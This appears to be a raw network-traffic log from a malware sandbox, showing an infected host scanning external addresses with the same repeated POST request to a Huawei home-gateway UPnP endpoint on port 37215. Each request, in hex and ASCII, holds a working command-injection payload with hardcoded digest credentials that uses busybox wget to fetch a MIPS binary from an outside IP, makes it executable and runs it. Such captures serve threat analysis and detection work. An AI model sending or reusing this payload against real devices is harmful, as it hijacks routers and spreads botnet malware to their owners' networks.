                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1150192.168.2.135938841.99.47.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.901463985 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1151192.168.2.134201641.51.146.10637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.903762102 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1152192.168.2.1354348156.187.103.11537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.906440020 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1153192.168.2.1336006197.194.181.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.909337997 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1154192.168.2.135507041.32.180.8837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.912210941 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1155192.168.2.1340194197.96.67.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.915406942 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1156192.168.2.1340248197.173.53.12737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.919958115 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1157192.168.2.1350140156.185.196.14137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.923310995 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1158192.168.2.1336352197.162.38.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.926116943 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1159192.168.2.1336822156.176.72.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.974215031 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
